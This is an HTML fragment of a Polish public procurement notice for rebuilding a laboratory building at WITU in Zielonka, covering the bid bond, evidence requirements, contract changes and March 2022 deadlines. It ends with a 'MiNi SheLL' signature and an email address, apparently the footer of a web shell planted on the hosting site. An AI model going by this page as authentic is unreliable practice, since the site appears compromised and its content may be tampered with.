4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego<br/>3)	art. 108 ust. 1 pkt 5 ustawy,<br/>4)	art. 108 ust. 1 pkt 6 ustawy,<br/>5)	art. 109 ust. 1 pkt 5 – 10 ustawy<br/> - sporządzone wg wzoru, który stanowi załącznik Nr 5</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową na min. 6 000 000,00 PLN (w okresie nie wcześniejszym niż 3 miesiąc przed jej złożeniem) - (na potwierdzenie warunku sytuacji ekonomicznej i finansowej)<br/>2.	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty; wzór stanowi załącznik nr 6 (na potwierdzenie warunku zdolności technicznej lub zawodowej )<br/><br/>3.	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami; Wzór stanowi załącznik nr 7 do SWZ. (na potwierdzenie warunku zdolności technicznej lub zawodowej )</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający żąda wniesienia wadium. Wykonawca przystępujący <br/>do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w kwocie: 60 000,00 zł (słownie złotych: sześćdziesiąt tysięcy złotych).<br/>2.	Wadium musi obejmować pełen okres związania ofertą.<br/>3.	Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp.<br/>4.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy w banku PKO BP S.A. Zielonka, 10 1020 1042 0000 8302 0014 7793, <br/>zaznaczeniem numeru sprawy ZPR/1/22/D8/L/16/004/03<br/>5.	Wadium musi wpłynąć na wskazany rachunek bankowy zamawiającego najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy zamawiającego).<br/>6.	W przypadku wnoszenia wadium w innej formie gwarancji lub poręczenia, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej poprzez wczytanie na Platformie zakupowej. Wadium powinno być oznaczone : Wadium – nr sprawy, nazwa postepowania lub inny pozwalający na identyfikację postępowania. Ponadto powinno zawierać następujące elementy:<br/>-	nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego), gwaranta/poręczyciela oraz wskazanie ich siedzib. <br/>-	określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>-	kwotę gwarancji/poręczenia,<br/>-	termin ważności gwarancji/poręczenia,<br/>-	zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp.<br/>7.	W przypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>8.	Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5 ustawy Pzp.<br/>9.	Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający, niezależnie od zmian wskazanych w § 10 ust. 7 – 9 i § 11, przewiduje<br/>możliwość dokonania istotnych zmian postanowień zawartej umowy w zakresie:<br/>1) terminu wykonania przedmiotu umowy wraz ze skutkami wprowadzenia takiej zmiany;<br/>2) zmiany zakresu przedmiotu umowy wraz ze skutkami wprowadzenia takiej zmiany;<br/>3) sposobu wykonywania przedmiotu umowy wraz ze skutkami wprowadzenia takiej zmiany;<br/>4) wynagrodzenia za wykonanie przedmiotu zamówienia wraz ze skutkami wprowadzenia takiej<br/>zmiany.<br/>2. Warunkiem dokonania zmiany określonej w ust. 1 powyżej są następujące sytuacje:<br/>1) istotne braki lub błędy w dokumentacji projektowej, również te polegających na niezgodności<br/>dokumentacji z przepisami prawa;<br/>2) uzasadnione zmiany w zakresie sposobu wykonania przedmiotu umowy proponowanych<br/>przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego;<br/>3) zmiany w sposobie wykonywania umowy spowodowane warunkami geologicznymi,<br/>terenowymi, archeologicznymi, wodnymi, itp. o których nie było wiadomo przy zawieraniu<br/>umowy, w szczególności odmienne od przyjętych w dokumentacji projektowej warunki terenowe,<br/>istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych;<br/>4) zmiana umowy dokonana na podstawie art. 455 ust. 1 pkt. 2 – 4 oraz ust. 2 ustawy PZP;<br/>5) zmiany będące następstwem działania organów administracji i innych instytucji, w<br/>szczególności: przekroczenie określonych przez prawo terminów wydawania przez organy i<br/>innych instytucji decyzji, zezwoleń, uzgodnień itp., odmowa wydania przez organy administracji i<br/>inne instytucje wymaganych decyzji, zezwoleń, uzgodnień, konieczność uzyskania wyroku<br/>sądowego lub innego orzeczenia sądu lub organu czy instytucji, którego konieczności nie<br/>przewidziano przy zawieraniu umowy, konieczność zaspokojenia roszczeń lub oczekiwań osób<br/>trzecich nie artykułowanych lub niemożliwych do jednoznacznego określenia w chwili zawierania<br/>umowy pod warunkiem, że działanie te nie są spowodowane zaniechaniem Wykonawcy;<br/>6) kolizji z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami, które<br/>mają wpływ na realizację niniejszej umowy;<br/>7) zaistnienie okoliczności siły wyższej, niezależnej od Zamawiającego i Wykonawcy, a której<br/>nie można było przewidzieć i która nie pozwala na kontynuację robót będących przedmiotem<br/>umowy, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego<br/>nie można było przewidzieć;<br/>8) działania osób trzecich uniemożliwiające wykonanie przedmiotu umowy, które to działania nie<br/>są konsekwencją winy którejkolwiek ze stron;<br/>9) stan epidemii lub inne zdarzenia związane z rozprzestrzenianiem się chorób zakaźnych np.<br/>wirusa SARS-Co V-2 wywołującego chorobę COVID-19 (koronawirus);<br/>10) z powodu konieczności wykonania robót zamiennych lub innych robót, niezbędnych do wykonania przedmiotu umowy;<br/>11) wystąpienia warunków atmosferycznych oraz ich skutków, uniemożliwiających prowadzenie<br/>robót budowlanych zgodnie ze specyfikacjami technicznymi wykonania i odbioru robót oraz<br/>sztuką budowlaną. Fakt wystąpienia tych okoliczności musi być bezwzględnie zgłoszony<br/>pisemnie do Zamawiającego.<br/>Szczegóły zmian zostały opisane w projektowanych postanowieniach umowy Załącznik Nr 8. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-04 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/witu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-04 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-02</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Pełna nazwa postępowania:<br/>„Inwestycja budowlana pn.: LABORATORIUM - rozbudowa, nadbudowa <br/>i przebudowa budynku oraz zmiana sposobu użytkowania części pomieszczeń w budynku biurowo- laboratoryjnym nr 80 na terenie WITU przy ul. Prymasa Stefana Wyszyńskiego 7 w Zielonce wraz z zagospodarowaniem terenu oraz niezbędnymi instalacjami zewnętrznymi i wewnętrznymi”<br/><br/><br/>Termin wykonania zamówienia publicznego: <br/>1)	w zakresie określonym w § 1 ust. 1 pkt 1 umowy: do 31 października 2023 roku od dnia zawarcia umowy<br/>2)	w zakresie określonym w § 1 ust. 1 pkt 2 umowy przez okres 12 miesięcy od dnia zakończenia realizacji przedmiotu umowy określonego w § 1 ust. 1 pkt 1 umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com